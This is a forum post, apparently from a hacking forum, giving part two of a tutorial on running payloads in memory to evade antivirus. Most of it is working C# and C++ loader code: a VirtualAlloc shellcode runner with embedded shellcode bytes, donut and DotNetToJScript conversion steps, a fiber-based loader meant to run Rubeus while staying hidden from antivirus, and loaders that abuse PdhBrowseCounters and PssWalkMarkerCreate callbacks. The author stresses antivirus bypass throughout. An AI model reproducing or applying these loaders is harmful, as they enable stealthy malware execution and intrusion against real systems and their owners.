The Disk Is Lava: Exploring Methods for Executing Payloads in Memory. PART 2

Tr0jan_Horse

Moderator
Staff member
MODERATOR
ULTIMATE
PREMIUM
MEMBER
Joined
Oct 23, 2024
Messages
304
Reaction score
8,792
Deposit
0$
We have learned how to perform Dotnet builds, but what if the program was written in C++? In this case, it is executed outside the CLR platform and will be considered unmanaged code. As a consequence, you will not be able to execute it in memory using the methods described above.

It's too early to put a stop to it, because there are shellcodes. What if we generate a shellcode from an existing C++ program, then stick this shellcode into a C# project where we implement the logic of injecting this shellcode into the address space of the current process? In this case, we will have a full-fledged assembly that is loaded using System.Reflection.Assembly.Load() and executes our shellcode. We get such a matryoshka doll of four puppets: the Assembly.Load() call is the first puppet, the loaded assembly is the second, the shellcode in the assembly is the third, and finally, the shellcode is our C++ program - the fourth.

So, first, I suggest preparing a program that will launch our shellcode. Here we will use the standard shellcode-runner using GetDelegateForFunctionPointer():
C#:
using System;
using System.Runtime.InteropServices;
 
namespace ShellcodeLoader
{
    public class Program
    {
        public static void Main(string[] args)
        {
            byte[] x86shc = new byte[193] {
            0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
            0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
            0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
            0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
            0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
            0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
            0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
            0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
            0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
            0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
            0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
            0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
            0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
 
            IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (uint)x86shc.Length,
                              0x1000, 0x40);
            Marshal.Copy(x86shc, 0, (IntPtr)(funcAddr), x86shc.Length);
            pFunc f = (pFunc)Marshal.GetDelegateForFunctionPointer(funcAddr, typeof(pFunc));
            f();
 
            return;
        }
 
        #region pinvokes
        [DllImport("kernel32.dll")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        delegate void pFunc();
 
        #endregion
    }
}
Now convert bytes of this assembly by the algorithm described above into base64 string and run it through System.Reflection.Assembly:
1746985563562.png

All right! Running the test shellcode works. It's time to move on to generating the shellcode itself. First, let's decide on the program. I suggest writing something more or less serious to test the theory for sure. Let's use graphics, various API calls, loops, callbacks and other nonsense:
1746985646495.png
C++:
#include <Windows.h>

LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
 
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    HWND hwnd;
    WNDCLASSEX wc = { sizeof(WNDCLASSEX), CS_HREDRAW | CS_VREDRAW, WindowProc, 0, 0, hInstance, NULL, LoadCursor(NULL, IDC_ARROW), NULL, NULL, L"MyWindowClass", NULL };
    RegisterClassEx(&wc);
    hwnd = CreateWindowEx(0, L"MyWindowClass", L"Pixel Drawing", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 800, 600, NULL, NULL, hInstance, NULL);
    ShowWindow(hwnd, nCmdShow);
 

    HDC hdc = GetDC(hwnd);
 
    // Рисование пикселей
    for (int x = 0; x < 800; x++)
    {
        for (int y = 0; y < 600; y++)
        {
            SetPixel(hdc, x, y, RGB(x % 256, y % 256, (x + y) % 256)); // Задаем цвет пикселя
        }
    }
 
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
 

    ReleaseDC(hwnd, hdc);
    UnregisterClass(L"MyWindowClass", hInstance);
    return 0;
}
 
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0);
        return 0;
    }
 
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
Then compile, after which you need to convert the program into shellcode. There are a lot of ready tools for this:
You can even use Visual Studio to generate shellcode, it is written in detail in this article. I am a simple person, so I suggest using the standard donut:

Bash:
donut.exe -i CodeToShc.exe -o code.bin -b 1
1746986209550.png

Then distill from .bin format to hexadecimal shellcode that can be inserted into the program:

Bash:
xxd -i code.bin > 1.h

The file will contain the shellcode of our program:
1746986299295.png
We add the shellcode to shellcode-runner and check that everything works:
1746986381917.png
All that remains is to get the assembly bytes and run that assembly via System.Reflection.Assembly:

1746986601195.png
And we get a successful shellcode assembly:
1746986692388.png
Due to this way of running shellcode, antivirus is unable to detect such injection method:
1746986727821.png

JScript conversion

There is a method to run Dotnet assemblies through JScript conversion, for this purpose the following tool is used: https://github.com/tyranid/DotNetToJScript.

First of all, download the project from the link above, open it in Studio, go to Solution Explorer → click on TestClass.cs in the ExampleAssembly project. Select compile as .dll.
1746986808146.png
Then our code should be inserted in the TestClass() class, for example, the following code outputs a message box:
C#:
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
[ComVisible(true)]
public class TestClass
{
                public TestClass()
                {
                               MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
                }
                public void RunProcess(string path)
                {
                               Process.Start(path);
                }
}
After successful compilation in .dll format, use the above downloaded toolkit to convert to js:
Bash:
DotNetToJScript.exe <DLL Name> --lang=Jscript --ver=<version of the .NET Framework> -o demo.js

# Ex
    DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
The resulting .js file can be safely run, which will lead to the execution of the code from TestClass(), namely - the appearance of MessageBox.

Fibers


Fibers are one of the units of code execution, like a process or a thread. A fieber works inside a particular thread. That is, a hierarchy of process → thread → fieber is built. There can be several fibers inside a thread. Fibers are managed and controlled by the application itself, not by the operating system. Fibers allow you to build more flexible synchronization mechanisms because they have their own stack and registers. Fibers are convenient to use for code execution hiding tasks, because code execution inside fibers is much harder to track than code execution inside a thread. The most interesting thing is that the fieber stack will be cleared as soon as the fieber finishes its work. As a result, it will be harder for antivirus software to detect malicious activity in our program.

If, however, the fieber internally calls another fieber, the stack will not be cleared. The stack and register values will be switched to those that should be in the fieber that was switched to. For example, if the main thread has an EAX register value of 0x00, fieber 1 has an EAX register value of 0x01, and fieber 2 has an EAX register value of 0x02, then when the main thread switches to fieber 1, the EAX register value will become 0x01, and when switching from fieber 1 to fieber 2, it will become 0x02. When fieber 2 is completed, it will take the value of fieber 1, and so on.

C++:
LPVOID CreateFiber(
  [in]           SIZE_T                dwStackSize,
  [in]           LPFIBER_START_ROUTINE lpStartAddress,
  [in, optional] LPVOID                lpParameter
);

Ideally, to hide the payload from AB you should place it somewhere in a file - for example, in PE, in a neighboring DLL or somewhere else. Then run a bunch of threads, a bunch of fibers in them, and a payload in some of the fibers.

Fibers are supported in both C# and C++. For a change, I suggest that this PoC be written in C++. So, the main function for working with fibers is CreateFiber():
  • dwStackSize - initial stack size
  • LPFIBER_START_ROUTINE - callback function, which will be considered the main function of the fieber. It is called when the fieber starts
  • lpParameter - some additional data that we want to pass to the fieber

Once the fiber is created, it can be started using SwitchToFiber(). Note that you cannot call this function directly from a thread - the control thread will not be switched. Therefore, you need to convert the current thread to a fiber using ConvertThreadToFiber() beforehand.

Fibers are great for executing our pailoads in memory because of their fairly good stealth. I propose to start writing a simple PoC with ten threads and ten fibers, but only one of the fibers will run our shellcode.

For synchronization I propose to use mutex. Let's create a mutex at the beginning of our program and then yank it before launching the shellcode to prevent its repeated launches.
C++:
#include <windows.h>
#include <vector>
#include <thread>
 
#define DEBUG
 
size_t numOfThreads = 10;
size_t numOfFibers = 10;
 
unsigned char shc[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6,\x00";
 
DWORD WINAPI threadProc(VOID*);
VOID WINAPI fiberProc(LPVOID);
 
HANDLE hMutex;
 
int main() {
    std::vector<HANDLE> threads(numOfThreads);
    hMutex = CreateMutex(NULL, FALSE, L"Mutex");
    for (auto& thread : threads)
    {
        thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)threadProc, NULL, 0, NULL);
    }
 
    for (auto& thread : threads)
    {
        WaitForSingleObject(thread, INFINITE);
    }
 
 
    return 0;
}
 
DWORD WINAPI threadProc(LPVOID lpParam) {
    std::vector<PVOID> fibers(numOfFibers);
    ConvertThreadToFiber(NULL);
 
 
 
    for (int i = 0; i < numOfFibers; ++i)
    {
        fibers[i] = CreateFiber(0, (LPFIBER_START_ROUTINE)fiberProc, (LPVOID)i);
        
    }
 
    while (true)
    {
        for (auto& fiber : fibers)
        {
            SwitchToFiber(fiber);
        }
    }
 
    return 0;
}
 
VOID WINAPI fiberProc(LPVOID lpParam) {
    WaitForSingleObject(hMutex, INFINITE);
    hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, L"Mutex");
    if (hMutex)
    {
        PVOID payload_mem = VirtualAlloc(0, sizeof(shc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(payload_mem, shc, sizeof(shc));
        ((void(*)())payload_mem)();
    }
 }
You only need to replace the shellcode with the Rubeus shellcode. Thanks to this serious code hiding, we successfully execute the code in memory again and stay out of antivirus' sight:
1746987232849.png

Special Loaders

There is a whole class of programs, so-called Reflective Loader's, which allow you to load code into memory. Reflective loading of code into memory is based on the fact that the developer himself creates an algorithm to put a PE-file into memory - just like Windows itself does. Or at least at a level so that the peyload can start.

There are quite a lot of ready PoCs on Github, I will highlight the most interesting ones:
  • Invoke-ReflectivePEInjection - a Verschell variant
  • RunPE - suitable for running both managed and unmanaged code
  • FilelessPELoader - one of the most intelligent implementations. Pulls peyload from a remote server
And we can separately distinguish a class of programs serving for reflexive DLL implementation:
  • post/windows/manage/reflective_dll_inject - MSF module
  • ReflectiveDllInjection
However, sometimes all these special loders are useless. In most pentest cases, it is enough to transfer a program into shellcode and then force the system to execute it somehow. And if you simply go off the beaten path and use a previously unknown method of running shellcode, you will most likely be able to bypass the antivirus.
For example, you can look for any functions that accept callback as one of their parameters. There are many GUI functions and GUI applications in Windows that accept callback. Say, for example, the PdhBrowseCounters() function can be used to display a special dialog box where we can select performance counters of interest to the system resource monitor program. The function takes a PDH_BROWSE_DLG_CONFIG structure, one of whose elements is pCallback.

The only problem is that this callback is only called after the user selects the desired performance counters. Again, we can select these counters for the user, and then using SendMessage() simulate sending a counter selection message to the desired window.
C++:
#include <windows.h>
#include <pdh.h>
#include <pdhmsg.h>
#include <stdio.h>
#include <iostream>
 
#pragma comment(lib, "pdh.lib")
 
 
 
DWORD WINAPI ThreadFunction(LPVOID lpParam)
{
    Sleep(5000);
    HWND hwnd = NULL;
    hwnd = FindWindow(NULL, L"s");
    ShowWindow(hwnd, SW_HIDE);
    if (hwnd)
    {
        HWND hwndButton = FindWindowEx(hwnd, NULL, L"Button", L"ОК"); // OK RUssian
 
        if (hwndButton)
        {
            SendMessage(hwndButton, BM_CLICK, 0, 0);
        }
        else {
            hwndButton = FindWindowEx(hwnd, NULL, L"Button", L"OK"); // OK English
            if (hwndButton) {
                SendMessage(hwndButton, BM_CLICK, 0, 0);
            }
            else {
                std::cout << "[-] Cant get handle on button" << std::endl;
            }
        }
    }
    return 0;
}
void ShowCounterBrowser()
{
 
    PDH_BROWSE_DLG_CONFIG dlg;
 
    ZeroMemory(&dlg, sizeof(PDH_BROWSE_DLG_CONFIG));
    unsigned char AbcdVar[] = "<SHELLCODE HERE>";
    PVOID addr = VirtualAlloc(0, sizeof(AbcdVar), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(addr, AbcdVar, sizeof(AbcdVar));
    dlg.pCallBack = (CounterPathCallBack)addr;
    dlg.dwCallBackArg = NULL;
 
    dlg.bIncludeInstanceIndex = FALSE;
    dlg.bSingleCounterPerAdd = TRUE;
    dlg.bSingleCounterPerDialog = TRUE;
    dlg.bLocalCountersOnly = FALSE;
    dlg.bWildCardInstances = TRUE;
    dlg.bHideDetailBox = TRUE;
    dlg.bInitializePath = FALSE;
    dlg.dwDefaultDetailLevel = PERF_DETAIL_WIZARD;
    dlg.szReturnPathBuffer = new wchar_t[PDH_MAX_COUNTER_PATH + 1];
    dlg.cchReturnPathLength = PDH_MAX_COUNTER_PATH;
    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
 
    if (PdhBrowseCounters(&dlg) == ERROR_SUCCESS)
    {
        printf("Chosen counter: %s\n", dlg.szReturnPathBuffer);
    }
    else
    {
        printf("No counter chosen\n");
    }
 
    delete[] dlg.szReturnPathBuffer;
}
 
int main()
{
    ShowCounterBrowser();
    return 0;
}

Or let it be the PssCaptureSnapshot() function, which allows you to create various process snapshots. After that, to get information about the snapshot, you can run through it using PssWalkMarkerCreate(), which needs to pass the PSS_ALLOCATOR structure as its first parameter, inside which the callbacks are specified. These callbacks themselves are needed for custom implementation of memory allocation and release functions when the system works with the snapshot, but nothing will prevent us from specifying our shellcode there:
C++:
#include <Windows.h>
#include <processsnapshot.h>
#include <iostream>
 
// Function To Rewrite
VOID* CALLBACK AllocRoutine(void* Context, DWORD Size)
{
    MessageBox(NULL, L"AllocRoutine function is called!", L"Information", MB_ICONINFORMATION);
    return (HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size));
}
 
int main()
{
    DWORD ProcessId = GetCurrentProcessId();
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    if (hProcess == NULL)
    {
        std::cerr << "Could not open the process." << std::endl;
        return 1;
    }
 
    HPSS SnapshotHandle = NULL;
    PSS_CAPTURE_FLAGS CaptureFlags = PSS_CAPTURE_NONE;
    DWORD SnapshotFlags = 0;
    DWORD Result = PssCaptureSnapshot(hProcess, CaptureFlags, SnapshotFlags, &SnapshotHandle);
    if (Result != ERROR_SUCCESS)
    {
        std::cerr << "Could not create the process snapshot. Error: " << Result << std::endl;
        return 1;
    }
 
    PSS_ALLOCATOR Allocator;
 
    Allocator.AllocRoutine = AllocRoutine;
    Allocator.FreeRoutine = NULL;
    unsigned char shellcode[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
        "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
        "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
        "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
        "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
        "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
        "\x48\x83\xec\x20\x41\xff\xd6,\x00";
    DWORD old;
    VirtualProtect(AllocRoutine, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &old);
    memcpy(AllocRoutine, shellcode, sizeof(shellcode));
    HPSSWALK WalkMarkerHandle;
    Result = PssWalkMarkerCreate(&Allocator, &WalkMarkerHandle);
    if (Result != ERROR_SUCCESS)
    {
        std::cerr << "Could not create the walk marker. Error: " << Result << std::endl;
        return 1;
    }
    PssFreeSnapshot(GetCurrentProcess(), SnapshotHandle);
    CloseHandle(hProcess);
    return 0;
}
As you can see, the flight of fancy can be any, it is not limited by anyone and nothing. The most important thing is not to be afraid to experiment and create.

Conclusion

To summarize, we can conclude that methods of in-memory execution are usually reduced either to using the features of a programming language, the functionality of which allows you to perform operations without interacting with the disk, or to generating shellcode from the executable program. On the other hand, it is bad practice to have shellcode explicitly present, so you need to mask it by all available means, but we will talk about this next time.
 
Top Bottom